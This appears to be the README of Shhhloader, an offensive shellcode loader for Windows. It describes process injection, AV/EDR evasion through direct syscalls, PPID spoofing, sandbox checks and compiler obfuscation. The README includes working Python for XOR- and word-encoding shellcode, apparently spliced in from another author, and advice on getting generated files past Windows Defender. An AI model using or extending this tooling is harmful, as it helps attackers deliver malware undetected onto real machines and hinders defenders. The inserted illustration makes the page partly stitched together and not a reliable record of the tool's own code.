Shhhloader is a SysWhispers/GetSyscallStub shellcode loader that is currently a work in progress. It takes raw shellcode as input and compiles a C++ stub that uses syscalls (rather than the usual Win32 API calls that AV/EDR hook) to try to bypass AV/EDR. The included Python builder will work on any Linux system that has Mingw-w64 installed.
8/9/22 EDIT: Some BIG updates have been made! New major features include: GetSyscallStub integration, Obfuscator-LLVM support, Module Stomping, automatic DLL Proxy generation, new sandbox evasion methods, and storing shellcode as an English word array. Big shout out to @Snovvcrash, @spotheplanet, @_RastaMouse, and @Cerbersec whose code I used as a reference for this tool.
┳┻|
┻┳|
┳┻|
┻┳|
┳┻| _
┻┳| •.•) - Shhhhh, AV might hear us!
┳┻|⊂ノ
┻┳|
usage: Shhhloader.py [-h] [-p explorer.exe] [-m QueueUserAPC] [-w] [-nr] [-ns] [-np] [-l] [-g] [-v] [-d] [-dp apphelp.dll]
[-s domain] [-sa testlab.local] [-o a.exe]
file
ICYGUIDER'S CUSTOM SYSCALL SHELLCODE LOADER
positional arguments:
file File containing raw shellcode
optional arguments:
-h, --help show this help message and exit
-p explorer.exe, --process explorer.exe
Process to inject into (Default: explorer.exe)
-m QueueUserAPC, --method QueueUserAPC
Method for shellcode execution (Options: ModuleStomping, QueueUserAPC, ProcessHollow,
EnumDisplayMonitors, RemoteThreadContext, RemoteThreadSuspended, CurrentThread) (Default: QueueUserAPC)
-w, --word-encode Save shellcode in stub as array of English words
-nr, --no-randomize Disable syscall name randomization
-ns, --no-sandbox Disable sandbox checks
-np, --no-ppid-spoof Disable PPID spoofing
-l, --llvm-obfuscator
Use Obfuscator-LLVM to compile stub
-g, --get-syscallstub
Use GetSyscallStub instead of SysWhispers2
-v, --verbose Enable debugging messages upon execution
-d, --dll Generate a DLL instead of EXE
-dp apphelp.dll, --dll-proxy apphelp.dll
Create Proxy DLL using supplied legitimate DLL (File must exist in current dir)
-s domain, --sandbox domain
Sandbox evasion technique (Options: sleep, domain, hostname, username, dll) (Default: sleep)
-sa testlab.local, --sandbox-arg testlab.local
Argument for sandbox evasion technique (Ex: WIN10CO-DESKTOP, testlab.local)
-o a.exe, --outfile a.exe
Name of compiled file
Features:
- 7 Different Shellcode Execution Methods (ModuleStomping, QueueUserAPC, ProcessHollow, EnumDisplayMonitors, RemoteThreadContext, RemoteThreadSuspended, CurrentThread)
- PPID Spoofing
- Block 3rd Party DLLs
- GetSyscallStub & SysWhispers2
- Obfuscator-LLVM (OLLVM) Support
- Automatic DLL Proxy Generation
- Syscall Name Randomization
- Store Shellcode as English Word Array
- XOR Encryption with Dynamic Key Generation
- Sandbox Evasion via Loaded DLL, Domain, User, Hostname, and System Enumeration
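The word-array and XOR features above are builder-side transformations of the raw shellcode. As an added illustration, not Shhhloader's own code (the project's word list, key length and array layout are not shown on this page and are assumed here), the following Python shows the round trip: the builder XORs the bytes with a freshly generated key and encodes each ciphertext byte as one word from a 256-word table, and the stub reverses both steps at runtime before injecting. The 16x16 compound-word table is a constructed stand-in for a real English word list.

```python
from __future__ import annotations

import secrets

_ADJ = ["blue", "red", "green", "small", "large", "quiet", "bright", "dark",
        "warm", "cold", "fast", "slow", "soft", "hard", "sweet", "sour"]
_NOUN = ["river", "stone", "cloud", "field", "tower", "garden", "window",
         "bridge", "forest", "valley", "harbor", "meadow", "castle",
         "lantern", "orchard", "island"]

# Constructed 256-entry word table (16 x 16 compounds) standing in for a
# curated English word list. The only property the scheme relies on is that
# each byte value 0..255 maps to exactly one distinct word.
WORD_TABLE = [a + n for a in _ADJ for n in _NOUN]
WORD_INDEX = {w: i for i, w in enumerate(WORD_TABLE)}
if len(WORD_INDEX) != 256:
    raise RuntimeError("word table must contain 256 distinct words")


def generate_key(length: int = 16) -> bytes:
    """Fresh random key per build, so no two generated stubs share a ciphertext."""
    return secrets.token_bytes(length)


def xor_crypt(data: bytes, key: bytes) -> bytes:
    """Repeating-key XOR. Symmetric: the same call encrypts and decrypts."""
    if not key:
        raise ValueError("key must not be empty")
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def bytes_to_words(data: bytes) -> list[str]:
    """One word per byte; the stub source then holds a string array, not 0x.. literals."""
    return [WORD_TABLE[b] for b in data]


def words_to_bytes(words: list[str]) -> bytes:
    """Inverse lookup; an unknown word means a corrupted array or mismatched table."""
    try:
        return bytes(WORD_INDEX[w] for w in words)
    except KeyError as exc:
        raise ValueError(f"word not in table: {exc.args[0]}") from None


def build_payload(shellcode: bytes, key: bytes | None = None) -> tuple[bytes, list[str]]:
    """Builder side: encrypt with a (new) key, then encode the ciphertext as words."""
    key = key if key is not None else generate_key()
    return key, bytes_to_words(xor_crypt(shellcode, key))


def stub_decode(key: bytes, words: list[str]) -> bytes:
    """Runtime side: what the generated stub does before injecting."""
    return xor_crypt(words_to_bytes(words), key)


def render_c_arrays(key: bytes, words: list[str]) -> str:
    """The C initializers a builder would paste into the stub template (assumed layout)."""
    key_init = ", ".join(f"0x{b:02x}" for b in key)
    word_init = ", ".join(f'"{w}"' for w in words)
    return (f"unsigned char key[{len(key)}] = {{ {key_init} }};\n"
            f"const char* words[{len(words)}] = {{ {word_init} }};")


if __name__ == "__main__":
    # Constructed sample bytes, not a real payload.
    sample = bytes([0xFC, 0x48, 0x83, 0xE4, 0xF0, 0xE8, 0xC0, 0x00, 0x00, 0x00])
    key, words = build_payload(sample)
    assert stub_decode(key, words) == sample
    print(render_c_arrays(key, words))
```

Because the stub carries the key next to the word array, the XOR layer is obfuscation against static byte-pattern scanning rather than confidentiality; the per-build key is what keeps the embedded blob from becoming a stable signature across generated files.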
The video below demonstrates the Module Stomping shellcode injection technique executed via DLL Proxying with Windows Defender fully enabled. As seen in the video, the Obfuscator-LLVM and English word list options were also used to help evade detection:
Shhhloader_Module_Stomping_DLL_Proxying.mp4
Known Issues:
- The Module Stomping method does not currently work with most stageless payloads. I believe this is due to a size limitation resulting from my shitty code or the DLL/function I am executing the shellcode in. For larger shellcode I recommend you use either the QueueUserAPC or RemoteThreadContext shellcode injection methods.
- Windows Defender will detect most files generated by this tool, so please do not post an issue saying "DETECTED!!!". Play around with the new options and features until you get something that works; they were added for a reason :). Executing the generated file in memory is also a good way to evade these detections.
- I'm sure there are a ton of bugs in my code. Please test everything in advance before using for something important, and PLEASE provide as much information as possible when opening an issue. (THANKS!)
OPTIONAL: To use the Obfuscator-LLVM flag, you must have it installed on your system alongside wclang. I've found this to be a bit of a pain but you should be able to do it with a little perseverance. Here's a step-by-step that I used to install the llvm-13.x branch of OLLVM on my Kali Linux system:
# Clone and Run CMake
git clone -b llvm-13.x https://github.com/heroims/obfuscator.git
mkdir build
cd build
cmake -DCMAKE_BUILD_TYPE=Release -DLLVM_ENABLE_NEW_PASS_MANAGER=OFF ../obfuscator/llvm/
# Configure CMake and Compile OLLVM (turn on the in-tree clang build by editing the generated cache)
export clang_build_dir=$(cd ../; pwd)/obfuscator/clang
sed -i 's/LLVM_TOOL_CLANG_BUILD:BOOL=OFF/LLVM_TOOL_CLANG_BUILD:BOOL=ON/g' CMakeCache.txt
sed -i "s|LLVM_EXTERNAL_CLANG_SOURCE_DIR:PATH=|LLVM_EXTERNAL_CLANG_SOURCE_DIR:PATH=$clang_build_dir|g" CMakeCache.txt
make -j7   # adjust the job count to your core count; this build takes a long time
# ONCE COMPILED, BACKUP ORIGINAL CLANG BINARIES
# (every write under /usr/bin and /lib/llvm-13 below needs root: run as root or prefix with sudo)
mv /usr/bin/clang /usr/bin/clang13.0.1
mv /usr/bin/clang++ /usr/bin/clang++13.0.1
# Then in OLLVM build/bin dir, copy the newly built clang bins (we are still in build/, so bin/ is build/bin/)
cp bin/clang /usr/bin/clang
cp bin/clang++ /usr/bin/clang++
# Then install wclang (provides the x86_64-w64-mingw32-clang wrapper checked at the end)
cd ..
git clone https://github.com/tpoechtrager/wclang.git
cd wclang/
cmake -DCMAKE_INSTALL_PREFIX=_prefix_ .
make
make install
export wclang_path=$(pwd)/_prefix_/bin
echo "export PATH=$wclang_path:$PATH" >> ~/.bashrc
export PATH=$wclang_path:$PATH
# Then backup original lib files
cp -R /lib/llvm-13/lib/clang/13.0.1/include/ /lib/llvm-13/lib/clang/13.0.1/include_backup/
# Finally in the OLLVM build/lib/clang/13.0.1/ dir, copy the include folder (paths are relative to wclang/)
cd ../build/lib/clang/13.0.1/
cp -R include/ /lib/llvm-13/lib/clang/13.0.1/
There is probably a better way to do this but this is what worked for me. If you have issues, just keep trying and ensure that you can run x86_64-w64-mingw32-clang -v and that the output contains either "Obfuscator-LLVM" or "heroims". Unfortunately I do not have the time to assist individuals who may need more help, but you can try reading this issue on my Nimcrypt2 repo where a couple of users figured out how to do it on their systems.
Greetz & Credit:
- @Jackson_T for his amazing project SysWhispers: https://github.com/jthuraisamy/SysWhispers
- @FalconForceTeam for their syscall generation tool that supports SysWhispers2: https://github.com/FalconForceTeam/SysWhispers2BOF
- @snovvcrash for their DInjector project, which I used as a template for many of the included injection techniques: https://github.com/snovvcrash/DInjector
- @Cerbersec for their Ares project, whose code I used for PPID Spoofing, Blocking 3rd Party DLLs and Sandbox Evasion: https://github.com/Cerbersec/Ares
- @spotheplanet for their blog post on Retrieving ntdll Syscall Stubs from Disk at Run-time: https://www.ired.team/offensive-security/defense-evasion/retrieving-ntdll-syscall-stubs-at-run-time
- @_RastaMouse for his code and article on Module Stomping which I ported to C++: https://offensivedefence.co.uk/posts/module-stomping/
- @s4ntiago_p for their NanoDump project and the randomize_sw2_seed.py script in particular: https://github.com/helpsystems/nanodump